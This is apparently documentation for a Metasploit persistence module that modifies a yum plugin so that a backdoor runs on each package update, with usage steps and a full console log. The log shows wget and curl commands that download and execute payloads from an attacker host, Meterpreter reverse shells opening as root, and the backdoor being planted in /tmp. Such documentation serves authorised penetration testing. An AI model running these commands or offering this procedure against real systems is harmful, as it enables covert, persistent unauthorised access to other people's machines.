documentation/modules/exploit/linux/persistence/yum_package_manager.md
This module will run a payload when the package manager is used.
This module modifies a yum plugin to launch a binary of choice.
grep -F 'enabled=1' /etc/yum/pluginconf.d/
will show what plugins are currently enabled on the system.
root persmissions are likely required.
Verified on Centos 7.1
use exploit/linux/persistence/yum_package_managerset SESSION <id>set PAYLOAD cmd/unix/reverse_python configure the payload as neededexploitWhen the system runs yum update the payload will launch. You must set handler accordingly.
Name of backdoor executable
Name of the yum plugin to target
Plugin path to use default is (/usr/lib/yum-plugins/)
Initial access vector via web delivery
resource (/root/.msf4/msfconsole.rc)> setg verbose true
verbose => true
resource (/root/.msf4/msfconsole.rc)> setg lhost 111.111.1.111
lhost => 111.111.1.111
resource (/root/.msf4/msfconsole.rc)> use exploit/multi/script/web_delivery
[*] Using configured payload python/meterpreter/reverse_tcp
resource (/root/.msf4/msfconsole.rc)> set srvport 8181
srvport => 8181
resource (/root/.msf4/msfconsole.rc)> set target 7
target => 7
resource (/root/.msf4/msfconsole.rc)> set payload payload/linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp
resource (/root/.msf4/msfconsole.rc)> set lport 4545
lport => 4545
resource (/root/.msf4/msfconsole.rc)> set URIPATH l
URIPATH => l
resource (/root/.msf4/msfconsole.rc)> run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Starting persistent handler(s)...
[*] Started reverse TCP handler on 111.111.1.111:4545
[*] Using URL: http://111.111.1.111:8181/l
[*] Server started.
[*] Run the following command on the target machine:
wget -qO KOiqZchh --no-check-certificate http://111.111.1.111:8181/l; chmod +x KOiqZchh; ./KOiqZchh& disown
[msf](Jobs:1 Agents:0) exploit(multi/script/web_delivery) >
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3045380 bytes) to 192.168.2.100
[*] Meterpreter session 1 opened (111.111.1.111:4545 -> 192.168.2.100:34470) at 2025-02-16 11:30:09 -0500
[msf](Jobs:1 Agents:1) exploit(multi/script/web_delivery) > use exploit/linux/persistence/yum_package_manager
[*] No payload configured, defaulting to cmd/linux/http/x64/meterpreter/reverse_tcp
[msf](Jobs:2 Agents:2) exploit(linux/persistence/yum_package_manager) > sessions -i 1
[*] Starting interaction with 1...
(Meterpreter 1)(/home/centos) > getuid
Server username: root
(Meterpreter 1)(/home/centos) > sysinfo
Computer : centos71.localdomain
OS : CentOS 7.9.2009 (Linux 3.10.0-1160.53.1.el7.x86_64)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
(Meterpreter 1)(/home/centos) > background
[*] Backgrounding session 1...
Persistence
[msf](Jobs:1 Agents:1) exploit(linux/persistence/yum_package_manager) > set session 1
session => 1
[msf](Jobs:1 Agents:1) exploit(linux/persistence/yum_package_manager) > exploit
[*] Command to run on remote host: curl -so ./lgtOaZox http://111.111.1.111:8080/Hg3DGEu9GqlWD06kh4AzFg;chmod +x ./lgtOaZox;./lgtOaZox&
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.
[msf](Jobs:2 Agents:1) exploit(linux/persistence/yum_package_manager) >
[*] Fetch handler listening on 111.111.1.111:8080
[*] HTTP server started
[*] Adding resource /Hg3DGEu9GqlWD06kh4AzFg
[*] Started reverse TCP handler on 111.111.1.111:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3045380 bytes) to 222.222.2.222
[+] Plugins are enabled!
[*] Meterpreter session 2 opened (111.111.1.111:4444 -> 222.222.2.222:53880) at 2025-02-16 11:30:59 -0500
[!] The service is running, but could not be validated. yum installed and plugin found, enabled, and backdoorable
[*] Attempting to modify plugin
[*] Backdoor uploaded to /tmp/7EtplboZD
[+] Backdoor will run on next Yum update
[*] Meterpreter-compatible Cleaup RC file: /root/.msf4/logs/persistence/centos71.localdomain_20250216.3101/centos71.localdomain_20250216.3101.rc